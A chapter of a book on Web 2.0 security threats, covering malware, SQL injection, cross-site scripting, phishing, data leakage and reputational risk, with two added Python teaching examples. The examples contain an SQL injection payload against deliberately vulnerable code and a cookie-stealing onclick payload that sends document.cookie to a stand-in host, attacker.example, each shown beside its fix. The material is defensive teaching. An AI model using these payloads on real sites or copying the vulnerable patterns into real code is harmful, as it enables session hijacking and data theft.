1. Web 2.0 Threats – How to Use Web 2.0 and Social Networking Sites Securely

Chapter 1. Web 2.0 Threats

The technologies and trends that are revolutionising the way we use the Web also create security risks. User-created content, synchronous communication, openness and transparency, online collaboration and the viral spread of Web 2.0 content each bring their own exposures. Table 1 summarises the type of security risk created by each Web 2.0 trend.

Table 1. The type of security risk created by Web 2.0 trends

Web 2.0 trend: User-created content
Web 2.0 technologies: blogs; wikis; social networking; collaboration tools; video sharing and photo sharing
Type of security risk:

  • User-created content accepted by a website is an input path through which attackers and malware can reach the site and its visitors.

  • The personal detail it exposes enables targeted phishing attacks.

  • Loss of productivity.

  • Data leakage.

  • Reputational damage.

Web 2.0 trend: Synchronous communication
Web 2.0 technologies: instant messaging; live blogging, e.g. Twitter
Type of security risk:

  • Outbound data leaks and inbound malware.

  • Unlike corporate e-mail, Twitter and instant messaging typically have no automatic back-up or archiving facility, so there is no record to review after an incident.

  • Because these channels are immediate and usually unlogged, files can be downloaded or exported without leaving any trace or record of having done so.

Web 2.0 trend: Openness and transparency
Web 2.0 technologies: mashups; technologies which enable music, video and photo sharing; social networking; open source software
Type of security risk:

  • Data leakage.

  • Reputational damage.

Web 2.0 trend: Online collaboration
Web 2.0 technologies: collaborative tools with file sharing
Type of security risk:

  • Many collaborative tools provide file sharing, a vector through which confidential information can be exported or malware imported.

  • Uploading and downloading files, particularly media files such as video and music, also creates high bandwidth demand, which can slow down an organisation’s network.

The types of threats to organisations using Web 2.0 applications include:

  • Infections and downtime caused by malware, viruses, worms, Trojans and spyware.

  • Hacking attacks which cause personal and company data loss, outsider control of networks.

  • Phishing and social engineering attacks which cause data leakage.

  • Threats from downloaded content.

  • Loss of productivity caused by employees’ use of Web 2.0 technologies for personal purposes.

  • Data leakage.

  • Reputational risk.

Malware and blended attacks

Malware includes viruses, worms, Trojans and spyware; Web 2.0 applications are no less susceptible to malware than Web 1.0 applications. Blogs, social networking sites, wikis and mashups are all susceptible to malware attacks. Folksonomies can enable links to malware-infected sites or files.

Web 2.0 tools enable users to upload files and documents. This increases the risk of malware being spread. For example, there are now over 25,000 different applications available for users of Facebook to share. Many of these applications are written by users and are made freely available, in an Open Source manner. There is no logical reason to assume that all files which are downloaded from ‘friends’ within social networking sites, or from applications within these sites, are malware and spyware free.

There are also blended attacks which specifically target Web 2.0 technologies. ‘Blended attacks’ combine several techniques in one campaign: typically a mass-mailing, virus-delivery mechanism is used to plant a Trojan on the target system, and the Trojan then gives the attacker a foothold from which to bypass firewalls and other perimeter defences.

For example, in December 2006, the ‘JS.Qspace’ worm was discovered by Symantec on MySpace[6]. This ‘worm’ injects code which directs the user to a phishing page. The phishing page attempts to steal MySpace credentials by asking users for e-mail addresses and passwords.

Another example of a blended attack is the Monster.com resume thefts of August 2007[7]. ‘Hackers used malware (Infostealer.Monstres) to gain unauthorised access to the Monster.com resume database and stole job seekers’ contact information. Compromised data included the name, address, telephone number, and e-mail address of people who registered with the job seeking service. Neither social security numbers nor credit card records are thought to have been exposed. However, the compromised data has been used to craft targeted phishing attacks that sought to trick users into downloading malicious software’. Typically, this sort of malware is designed to intercept and pass on the details of financial transactions.

Hacking attacks

Insecure Web 2.0 applications can open security holes in a corporate operating system or other application, and when the original weakness is patched the ‘derived’ vulnerabilities it created are not necessarily fixed with it; Web 2.0 companies do not necessarily communicate sufficiently with users whose systems may have been compromised in the meantime. For example, security vulnerabilities in Gmail allowed e-mails to be transferred to attackers and stolen, with consequent potential data disclosure[8]. Although Google patched the vulnerability, Gmail users were not necessarily made aware that any changes an attacker had already made inside their own accounts needed to be found and undone. The fact that Web 2.0 companies apparently prefer to downplay such issues might make them a preferred attack vector for hackers and malware authors.

Hacking attacks are increasingly moving away from exploiting vulnerabilities in the underlying platform and towards flaws in the application code itself[9]. Any website which accepts input from users provides openings for attacks such as SQL injection and cross-site scripting.

SQL injection attacks

An SQL injection attack is an exploit in which an attacker causes the application’s database to execute SQL statements of the attacker’s choosing, simply by typing them into the web application’s input fields from an ordinary browser[10]. SQL (‘Structured Query Language’) is the language used to query and update relational databases; it is based on relational algebra and mathematical set theory.

For example, where a sales website asks for a postcode or zip code, an attacker may instead enter a fragment of SQL. If the application builds its query by pasting the typed text into the SQL statement, that fragment becomes part of the query and changes what it does, for instance returning every customer record rather than the one matching a postcode.

SQL injection can corrupt or destroy data, or allow attackers to retrieve data such as credit card numbers, so it can prove extremely costly for organisations. It is far preferable to prevent SQL injection from occurring than to deal with its consequences.

A well-written application never allows user input to become part of the structure of an SQL statement: it passes user-supplied values to the database as parameters of a prepared (parameterised) query, so that they are treated as data whatever characters they contain. Rejecting input that merely ‘looks like SQL’ is not a substitute, since attackers encode and disguise their payloads. There is therefore a need to develop web applications that are secure in this way, and to keep them so.
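As an added illustration (not code from the book), the following Python script builds a small in-memory SQLite table standing in for the sales website’s customer database and runs the postcode lookup both ways: by pasting the typed value into the SQL text, and as a bound parameter. The table, its rows and the card numbers are constructed for the example. The tautology payload ' OR '1'='1 makes the concatenated query return every row, card numbers included, while the parameterised query treats the same text as a postcode that matches nothing.

```python
import sqlite3

# Constructed sample data: a hypothetical "customers" table standing in for
# the sales website's database. Card numbers are well-known test values.
SAMPLE_ROWS = [
    ("alice", "SW1A 1AA", "4111111111111111"),
    ("bob", "EC1A 1BB", "5500000000000004"),
    ("carol", "M1 1AE", "340000000000009"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (name TEXT, postcode TEXT, card_number TEXT)"
    )
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, postcode):
    """Build the statement by string concatenation: whatever the user typed
    becomes part of the SQL itself, so quotes and keywords are interpreted."""
    sql = (
        "SELECT name, card_number FROM customers WHERE postcode = '"
        + postcode
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, postcode):
    """Pass the user's value as a bound parameter: the driver hands it to the
    database as data, so it can never alter the structure of the query."""
    sql = "SELECT name, card_number FROM customers WHERE postcode = ?"
    return conn.execute(sql, (postcode,)).fetchall()


# The classic tautology payload typed into the postcode field. Against the
# concatenated query it yields  WHERE postcode = '' OR '1'='1'  (always true).
INJECTION = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("honest input, vulnerable :", lookup_vulnerable(db, "M1 1AE"))
    print("injection, vulnerable    :", lookup_vulnerable(db, INJECTION))
    print("injection, parameterised :", lookup_parameterised(db, INJECTION))
```

Run it directly to see the three result sets. The same concatenation defect is what lets an attacker corrupt data with stacked or UNION statements where the database driver permits them; Python’s sqlite3 refuses to run more than one statement per execute() call, which is why the example uses a tautology rather than a DROP.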

Cross-site scripting

Cross-site scripting, or XSS[11], attacks involve injecting code such as JavaScript or VBScript into a web page that the server then returns to other users’ browsers, typically through user-supplied content that the site echoes back without encoding it. When a victim’s browser executes this code it runs within the victim’s session and with the site’s privileges, exposing the user to a variety of threats, including cookie theft, keystroke logging, screen scraping and denial of service.

Cookie theft

A cookie is a small data file[12] that a website stores on a surfer’s computer and which contains information about the user (e.g. user preferences) that is relevant to the user’s experience of the website.

Cookie theft occurs when an attacker uses injected code to obtain the data held in a user’s cookies without the user’s knowledge. For example, the attacker can inject into the page a link reading ‘Click here!’; when the user clicks it, the injected script sends their cookies, which may include the session token that identifies them to the site, to the attacker’s server.
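To make the cross-site scripting and cookie-theft mechanism concrete, here is an added Python example (not from the book) of a comments page rendered two ways. The attacker’s comment carries a ‘Click here!’ link of the kind described above, with an onclick handler that would send document.cookie to a hypothetical host attacker.example; the comment text, author names and host are all constructed for the example. A small parser built on Python’s html.parser stands in for the browser and reports any script tags or on* event-handler attributes in the rendered page; the escaped rendering yields none. The session_cookie_header function shows the HttpOnly attribute, which keeps a cookie out of document.cookie even when an XSS bug is present.

```python
import html
from html.parser import HTMLParser

# Constructed payload of the kind described under "Cookie theft": a link that,
# when clicked, ships the visitor's cookies to a hypothetical attacker host.
COOKIE_THIEF = (
    '<a href="#" onclick="location=\'http://attacker.example/?c=\'+document.cookie">'
    "Click here!</a>"
)

PAGE = "<html><body><h1>Comments</h1>{items}</body></html>"


def render_vulnerable(comments):
    """Concatenate user-supplied text straight into the page: any markup or
    script inside a comment becomes part of the document the browser runs."""
    items = "".join(f"<p><b>{who}</b>: {text}</p>" for who, text in comments)
    return PAGE.format(items=items)


def render_safe(comments):
    """HTML-encode every user-supplied value at the point of output, so the
    browser displays <, >, &, " and ' as characters and never parses them as tags."""
    items = "".join(
        f"<p><b>{html.escape(who)}</b>: {html.escape(text)}</p>"
        for who, text in comments
    )
    return PAGE.format(items=items)


class ActiveContentFinder(HTMLParser):
    """Parse a rendered page the way a browser would and record every
    <script> tag and every on* event-handler attribute, i.e. injected script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", None))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, f"{name}={value}"))


def find_active_content(page):
    """Return a list of (tag, detail) pairs for active content found in page."""
    finder = ActiveContentFinder()
    finder.feed(page)
    return finder.findings


def session_cookie_header(token):
    """Set-Cookie header for a session cookie. HttpOnly hides it from
    document.cookie, so a script like COOKIE_THIEF cannot read it even if an
    XSS bug exists; Secure keeps it off plaintext HTTP."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Strict; Path=/"


# Constructed sample comments: one honest, one carrying the payload.
COMMENTS = [("alice", "Nice post"), ("mallory", COOKIE_THIEF)]

if __name__ == "__main__":
    print("vulnerable:", find_active_content(render_vulnerable(COMMENTS)))
    print("escaped   :", find_active_content(render_safe(COMMENTS)))
    print(session_cookie_header("c0ffee"))
```

Output encoding at the point of rendering is the primary defence; HttpOnly limits the damage when that defence fails, but it does not stop injected script from acting on the user’s behalf within the page, which is why both are needed.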

Keystroke logging

Keystroke logging occurs when attackers record the keys pressed on a computer keyboard using special software[13]. This software can be installed on the computer (in which case anti-spyware software may detect it), or it can run inside a covert hardware device attached to the computer, which anti-spyware software will not detect. In the cross-site scripting case the ‘software’ is script injected into the page, which captures whatever is typed into that page. Keystroke logging can lead to the theft of user identification and authentication data.

Screen scraping

As the name suggests, screen scraping is a technique in which a program extracts data from the display output of another program[14]. In the context of IT security, screen scraping can capture authentication information that a keystroke logger would miss, for example values the user selects from drop-down lists.

Denial of service

A ‘denial of service’ (DoS) attack[15] is designed to put an organisation out of business, or to interrupt the activities of an individual or group of individuals, for a time by overwhelming its systems. This is usually done by flooding a web server (or other device) with more requests, e-mail messages or other data than it can handle, so that it is unable to provide normal service to authorised users.

Threats from downloaded content

Users need to ensure that downloaded content comes from a reliable source. However harmless, innocent, cute or valuable it looks, they should not click on a link or download a file unless they are confident it comes from a trustworthy source.

The risk in downloading software of unknown provenance is that malware, spyware or adware arrives with it. When users browse to a website, they should make sure that it is actually the site they think it is and that they have not been redirected elsewhere; a look-alike site can harvest personal or company data and push a download through the browser.

For example, Risk Management[16] describes malware present in Facebook, the social networking application: users invited friends to download the ‘crush calculator’ application, which then downloaded adware without the user’s knowledge. Sophos describe[17] how visitors attempting to purchase tickets for the Euro 2008 championships may have been exposed to malware which then attempted to download further attack code from a second website. Similarly, the UK ITV website was infected with code[18] which displayed adverts claiming to detect ‘compromising files’ and prompting users to purchase the ‘Cleanator’ or ‘MacSweeper’ program.

Phishing

The personal and sensitive information which is provided on social networking sites enables phishers to create targeted phishing attacks. The inclusion of such personal and sensitive data creates a level of plausibility which means that the attacks are far more likely to be successful. This highly targeted attack is called ‘spear phishing’. In addition, fake profiles are used to create false friendships, for misuse at a later stage.

Sophos, an IT security and control company, conducted some research in which they created a fake profile for ‘Freddi Staur’, a small green plastic frog who divulged minimal information about himself. Sophos then sent out 200 friend requests to observe how people would respond and how much personal information would be revealed. The findings were as follows[20]:

  • 87 of the 200 Facebook users contacted responded to Freddi, and 82 of them (41% of those approached) provided personal information.

  • 72% of respondents divulged one or more e-mail addresses.

  • 84% of respondents listed their full date of birth.

  • 87% of respondents provided details about their education or workplace.

  • 78% of respondents listed their current address or location.

  • 23% of respondents listed their current phone number.

  • 26% of respondents provided their IM (Instant Messaging) screen name.

Some phishers are e-mailing invitations to associates, creating log-in screens that falsely represent the social site registration page and using this opportunity to acquire genuine user names and passwords. Many people use just one password for all of their online activity, and will repeat it on the false social networking site. Acquiring knowledge of this password can be incredibly valuable to an attacker.

Social engineering

There are concerns that the increase in malware in certain industry sectors is linked to social engineering[21]. A study by ScanSafe showed a higher incidence of malware attacks in the energy and oil, pharmaceutical and chemical, engineering and construction, and transportation industries. The study suggests that the malware was delivered not by victims clicking on a link or typing in a URL, but by legitimate websites that had themselves been compromised.

Loss of productivity

Web 2.0 sites and in particular, social networking sites, can be very addictive as well as time consuming.

A report recently published by Global Secure Systems (GSS) and Infosec Europe 2008[22] puts the cost of lost productivity to UK organisations at £6.5 billion[23] (€8.1 billion, $12.7 billion). These results showed that some respondents were spending three hours a day on Web 2.0 sites. In addition, one company reported that the use of such sites cost it an extra 30% in bandwidth.

The cost of lost productivity was calculated[24] as A x B x C x D x E, where:

A = £11.46 (this is the mean figure based on the average hourly rate of pay for an office worker (£8.70 an hour) and the average hourly rate of an office manager (£14.23) according to the Office for National Statistics 2007).

B = 11.5 million employees have Internet access at work (Office for National Statistics 2007).

C = average of 45 working weeks in a year (52 weeks minus four weeks holiday, two weeks of bank holidays and one week off sick).

D = average of two hours 30 minutes a week visiting social networking sites.

E = 41% of employees admitting to visiting social networking sites at work (according to the survey).

As a check, multiplying the inputs exactly as quoted (11.46 x 11,500,000 x 45 x 2.5 x 0.41) gives approximately £6.08 billion rather than £6.5 billion; the source does not explain the difference, which may reflect rounding of the published inputs.

A recent survey carried out by FaceTime reported the percentages of employees who used their PC at work for personal reasons (see Figure 4).

Figure 4. Graph showing the percentage of staff using their PC at work for personal reasons. Source: Derived from FaceTime Fourth Annual Survey, October 2008, www.facetime.com/survey08/securityincidents/

However, it may be that the quoted figures on productivity loss belie the true picture. Those employees who use their PC at work for personal reasons may also use their computers at home for work purposes. The same FaceTime study showed that 85% of employees who owned a PC used their PC at home for work e-mail purposes. 79% used social networking at work, for work purposes. Employees used sites such as Facebook, LinkedIn and YouTube for business reasons and 51% visited such sites at least once a day.

In addition, there is a growing awareness that the preferred communication methods of the newer entrants to the workforce are different to those of their older colleagues. Much of the younger workforce is used to communicating using tools such as social networking sites in preference to ‘traditional’ tools such as e-mail. Pete Swabey[25] suggests that ‘social networking sites succeed where countless enterprise knowledge management and collaboration projects have failed’.

There are views that employee productivity issues are a reflection of management styles. Chris Head, from the UK public sector portal says ‘Good managers do not worry about time wasting; they judge performance by output, not whether the employee is present from nine to five. Denied the opportunity to use social networking, time-wasters will find plenty of other outlets’[26].

Cultural factors also play a part. Anecdotal evidence from Ben Chai[27] suggests that ‘privilege abuse’, that is, using sites at work which are not allowed according to their employer’s Internet acceptable use policy, is to some extent determined by culture and is more prevalent in the UK than elsewhere in the world.

Data leakage

Web 2.0 technologies create many risks for employees and organisations in respect of possible leakage of personal and company data.

Most users are unaware of the vast quantity of personal data that they voluntarily or accidentally disclose and which is then spread over the Internet. Neither are they aware of the potential for the abuse and reuse of this data in contexts other than those for which they were gathered. Collections of data are not static, the scope, function and ownership can change rapidly and the data subjects are not necessarily aware of how their data is or could be used.

Most importantly, once data has been disclosed it cannot reliably be recalled: copies may persist in search engine caches, backups and other people’s accounts long after the original is deleted.

The different types of personal and company data and associated risks

We all hope that personal data entered onto a website will be secure and free from data breaches or the inadvertent disclosure to unauthorised parties. However, unfortunately, this may not always be the case. The press is full of examples of data breaches, many of them breaches of data entered onto websites.

Depending on the type of data which is inadvertently disclosed, this can have differing ramifications. It is important to understand the criticality of these ramifications when entering data onto a Web 2.0 website.

Name and e-mail address

These can be used for phishing attacks.

General personal data

As noted under ‘Phishing’ above, the personal and sensitive information provided on social networking sites gives phishers the material for targeted ‘spear phishing’ attacks, whose plausibility makes them far more likely to succeed.

Bank account information

This can be used to make fraudulent financial purchases.

Date of birth/mother’s maiden name

This constitutes personally identifiable information which can be used to obtain a driving licence or a passport. These can in turn be used fraudulently to take out large loans in another person’s name, or as proof of ID if arrested. This also makes identity theft possible, as a result of which a victim will discover that someone else has run up large financial debts or even acquired criminal convictions in their name. Clearing up identity theft can be extremely time-consuming, expensive and very difficult.

CVs and professional homepages

These contain information that can also be used for identity theft. The UK BBC News has reported that, in an experiment involving a fake website luring people into submitting their CVs, 61 contained sufficient information to apply for a credit card[28]. According to iProfile, ‘the most useful items of information for criminals, which should be omitted from an online CV, are date of birth, marital status, and place of birth’[29].

The Internet also makes it easy to identify those individuals it would be most lucrative to steal from in terms of the type of job they have and the kind of salary they earn.

The volume of personal and company data stored on the Internet

Not only do more and more bodies hold our basic personal details in their systems, but also new information may be added every day. According to one estimate made in 2004, information about the average working adult is stored on some 700 databases[30].

The amount of personal data which is stored and aggregated electronically is greater now than ever before. Examples include:

  1. Companies increasingly use personal information to better target products and services and to try and establish a relationship with customers through learning key pieces of personal information. For example, Amazon uses information about previous purchasing, and previous web activity in order to target products that the customer might be interested in purchasing in the future.

  2. The public sector increasingly holds personal data electronically. Examples include driving licence information, tax, national insurance, child benefit and electoral roll. The data held often includes bank account numbers and personally identifiable information.

  3. Credit companies such as Experian hold records of financial transactions and credit card ownership to provide comments on customer creditworthiness.

  4. Transport operators will use information from travel tickets purchased online to develop a picture of an individual’s travel patterns.

  5. Governments use personal data for crime detection and surveillance purposes. For example, government agencies may ‘mine’ personal data such as phone, medical and travel records or websites visited[31]. The National Research Council says: ‘Each time a person makes a telephone call, uses a credit card, pays taxes, or takes a trip, he or she leaves digital tracks, records that often end up in massive corporate or government databases… Agencies use sophisticated techniques to mine some of these databases – searching for information on particular suspects, and looking for unusual patterns of activity that may indicate a terrorist network… Although some laws limit what types of data the government may collect, there are few legal limits on how agencies can use already-collected data, including those gathered by private companies’[32].

Length of time personal and company data is stored on the Internet

Although it might be possible to disable an account, it is not always possible to delete the account or its data, which may therefore remain indefinitely. For example, deactivating a Facebook account leaves the profile data in place; permanent deletion is a separate procedure (see Table 2). In addition, data published on websites, including personal data, can remain available in search engine caches and SERPs (Search Engine Results Pages) long after the original has been removed.

The following table describes the permanence of data stored in a selection of web applications:

Table 2. The permanence of data stored in a selection of Web applications

Web application: Facebook
Permanence of data: Personal data stored in a profile, including photos, interests and friends, can be deleted, with the exception of name and date of birth. Facebook will deactivate or delete an account; deletion is requested through its ‘How to permanently delete your Facebook account’ page.

Web application: Wikipedia
Permanence of data: The following extract is from the Wikimedia Foundation privacy policy[33]: ‘Removing text from Wikimedia projects does not permanently delete it. In normal articles, anyone can look at a previous version and see what was there. If an article is “deleted”, any user with “administrator” access on the wiki, meaning almost anyone trusted not to abuse the deletion capability, can see what was deleted. Information can be permanently deleted by those people with access to the servers, but there is no guarantee this will happen except in response to legal action’.

Web application: Google
Permanence of data: The most recent reports (9 September 2008) are that Google retains users’ personally identifiable search log data for nine months before anonymising it[34].

Web application: Yahoo
Permanence of data: Yahoo stores users’ personally identifiable information, including name, e-mail address, date of birth, gender, postcode, occupation, industry and personal interests[35]. Users can request that Yahoo delete an account. The current Yahoo privacy policy (October 2008) says that[36]: ‘An account will be deactivated and then deleted from our user registration database in approximately 90 days. This delay is necessary to discourage users from engaging in fraudulent activity. Any information that we have copied may remain in back-up storage for some period of time after your deletion request’.

[33] ‘Privacy policy from the Wikimedia Foundation’, Wikipedia, http://wikimediafoundation.org/wiki/Privacy_policy.

[34] ‘Google cuts how long it stores users’ personal data’, Reuters, 9 September 2008, www.reuters.com/article/technologyNews/idUSN0847077420080909.

[35] ‘Yahoo! Privacy and Cookie Policy’, http://info.yahoo.com/privacy/uk/yahoo/.

Subsequent uses of personal and company data

Web users should be aware that personal data posted to a website may subsequently be used in ways which previously have not been anticipated and which may lead to false information or false allegations.

Increased computing power and storage mean that companies are ever more able to derive value from combining masses of data. Companies use personal information to target products and services and to try to establish a marketing relationship with customers by learning key pieces of personal information. ‘Data warehouses are mined to bring out added value from previously disparate and disconnected snippets of personal data and companies offer benefits in return for the submission of this information from potential customers’[37]. This increasing use of personal data also increases the risk of its accidental and malicious misuse. In addition, there is a greater likelihood that inappropriate use of personal data will cause harm, for example refused credit or health insurance.

For example, the National Research Council says that ‘even well-managed programmes necessarily result in some “false positives” where innocent people are flagged as possible threats, and their personal information is examined’[38]. In 2003, Tesco traced a customer mistakenly suspected of stealing from one of its stores to her home through her loyalty card after watching her on a CCTV system[39]. RAND report that ‘the ability of data controllers to correlate disparate snippets of personal data may result in more systemic social and demographic exclusion; for example, prior denial of access to health insurance due to knowledge of susceptibility to certain diseases gained from DNA or sensitive personal data’[40].

Personal and company profiles and the broad meaning of ‘friends’

Many Web 2.0 technologies use ‘user profiles’ to enable users to participate in conversation threads and download content. In addition, social networking sites use the concept of ‘friends’ as a level of information sharing. User profiles and the concept of friends, combined with the ‘open’ approach to Web 2.0 technologies have meant that users are less aware of the risks of disclosing company and/or personal data. There is evidence which supports this.

For example, a survey carried out by IT Governance Ltd in May 2008 showed that over 27% of respondents would feel comfortable about providing their date of birth on a social networking site, and 11% would feel comfortable about providing their religious beliefs, sexual orientation and recent party photos. Apart from the data privacy and data protection issues, such data can be used for identity theft and targeted spear phishing attacks, can reveal personal information whose publication could be defamatory, and can expose confidential company information.

Websites using Web 2.0 technologies are able to collect and collate very large amounts of personal data. This may be stored on User profiles, comments posted on a blog or wiki or on Web 2.0 collaboration tools, or uploaded to social networking tools.

There are four aspects of control over personal data, which users may or may not be able to change:

  1. Visibility of data. The settings for the visibility of data may be changed. For example, on social networking sites, users can determine who is able to view their personal profile: family and friends, contacts or everyone. This may be set for the entire profile, or for specific data items such as date of birth.

  2. Account activation or deactivation. When an account is deactivated, the personal data remains on the service’s systems but is not visible to others.

  3. Account deletion, which removes the account and, to the extent the service permits, its data.

  4. Items copied to other social networks or sites, which remain outside the original user’s control.

Frequently, the default setting is for personal and sensitive data to be publicly available.

The available settings for the visibility of personal and sensitive data stored in a ‘profile’ are usually:

  • Private

  • Available to friends only

  • Publicly available

  • A combination.

We created fictitious accounts in Facebook, MySpace and Bebo in order to determine the default privacy settings. As an example, the following table shows the default privacy setting for date of birth – often a key security-related question for accessing bank accounts – for a selection of social networking sites:

Table 3. Default settings for the visibility of date of birth on selected social networking sites

Social networking site: Facebook
Default setting: Available to friends

Social networking site: MySpace
Default setting: Available to friends

Social networking site: Bebo
Default setting: Private

The concept of ‘friends’

Social networking is based on the concept of ‘friends’, a word which has connotations of trust, loyalty and liking. The dictionary definition of ‘friend’ is ‘a person whom you know well and whom you like a lot, but who is usually not a member of your family’[41]. The social networking sense of the word ‘friend’ is slightly different; the term ‘buddy’ may be more appropriate as a description of someone with whom one can share likes and dislikes and information but to whom one would not normally disclose confidential or valuable information.

Social networking sites enable users to link to other ‘friends’ by voice, chat, instant message, videoconference and blog. The danger is that the connotations of friendship can lull users into a false sense of security as a result of which they will share or provide information and data which in other circumstances they would keep to themselves.

Reputational risk

The viral nature of Web 2.0 technologies, the philosophy of openness and sharing amongst ‘friends’ and the permanence of data stored on the Internet combine to create enhanced risks of personal and company reputational damage.

The interactive and informal nature of Web 2.0 technologies makes it easier than ever for people to pretend to be from reputable companies, thereby causing brand damage. For example, Risk Management[42] describes how ‘Janet at ExxonMobilCorp’ posed as a company employee on Twitter.



[7] ‘Internet Risk Management in the Web 2.0 World’, Forrester Computing, September 2007.

[8] ‘Bullseye on Google: Hackers expose holes in Gmail, Blogspot, Search Appliance’, ZDNet, 25 September 2007, http://blogs.zdnet.com/security/?p=539.

[9] ‘Strategies to protect your web applications and your organisation’, John Pescatore, Gartner, IT Briefing centre webcast.

[10] ‘SQL Injection’, SmoothWall, www.smoothwall.net/support/glossary.php#S.

[11] Web 2.0 Security for Dummies, Clearswift, 2007.

[12] A Dictionary of Information Security Terms, Abbreviations and Acronyms, Alan Calder and Steve Watkins, IT Governance Publishing (2007).

[13] A Dictionary of Information Security Terms, Abbreviations and Acronyms, Alan Calder and Steve Watkins, IT Governance Publishing (2007).

[14] ‘Screen scraping’, Wikipedia, http://en.wikipedia.org/wiki/Screen_scraping.

[15] A Dictionary of Information Security Terms, Abbreviations and Acronyms, Alan Calder and Steve Watkins, IT Governance Publishing (2007).

[17] ‘Euro 2008 football ticket website hacked by cybercriminals to infect unwary fans’, Sophos, March 2008, www.sophos.com/pressoffice/news/articles/2008/03/euro2008.html.

[18] ‘Poisoned TV website adverts lead to PC and Mac scareware’, Sophos, February 2008, www.sophos.com/pressoffice/news/articles/2008/02/poisoned-adverts.html.

[19] ‘Bullseye on Google: Hackers expose holes in Gmail, Blogspot, Search Appliance’, ZDNet, 25 September 2007, http://blogs.zdnet.com/security/?p=539.

[21] ‘Web-borne malware targets unexpected industries’, Neil Roiter, SearchSecurity.com, 13 November 2008, http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1338866,00.html.

[23] £6,500,000,000, quoted by GSS.

[25] ‘Power to the People’, Information Age, April 2008.

[26] ‘Web revolution heralds bright future’, Chris Head, The Information Portal for the Public Sector, October 2008, www.publicservice.co.uk/feature_story.asp?id=10653.

[27] Ben Chai (Security Consultant, Incoming Thought Limited), ‘Securely tapping into the business benefits of Web 2.0 technology’, Infosecurity webinar, 11 June 2008.

[28] ‘Job seekers warned over CV theft’, BBC News, 20 October 2008, http://news.bbc.co.uk/2/hi/business/7680091.stm.

[29] ‘Secure your CV’, iProfile, October 2008, www.iprofile.org/Career-Advice/Secure-Your-CV/default.aspx.

[30] ‘Data protection – Who’s watching you?’, Lisa Kelly, AccountancyAge, August 2004, www.accountancyage.com/accountancyage/features/2040414/protection-watching.

[31] ‘All Counterterrorism Programs That Collect and Mine Data Should Be Evaluated for Effectiveness, Privacy Impacts; Congress Should Consider New Privacy Safeguards’, 7 October 2008, The National Academies, www8.nationalacademies.org/onpinews/newsitem.aspx?RecordID=10072008A.

[32] ‘All Counterterrorism Programs That Collect and Mine Data Should Be Evaluated for Effectiveness, Privacy Impacts; Congress Should Consider New Privacy Safeguards’, 7 October 2008, The National Academies, www8.nationalacademies.org/onpinews/newsitem.aspx?RecordID=10072008A.

[37] ‘Review of EU Data Protection Directive, Inception Report’, Robinson et al, RAND Corporation, August 2008, www.rand.org/pubs/working_papers/WR607/.

[38] ‘All Counterterrorism Programs That Collect and Mine Data Should Be Evaluated for Effectiveness, Privacy Impacts; Congress Should Consider New Privacy Safeguards’, 7 October 2008, The National Academies, www8.nationalacademies.org/onpinews/newsitem.aspx?RecordID=10072008A.

[39] ‘Data protection – Who’s watching you?’, Lisa Kelly, AccountancyAge, August 2004, www.accountancyage.com/accountancyage/features/2040414/protection-watching.

[40] ‘Review of EU Data Protection Directive, Inception Report’, Robinson et al, RAND Corporation, August 2008, www.rand.org/pubs/working_papers/WR607/.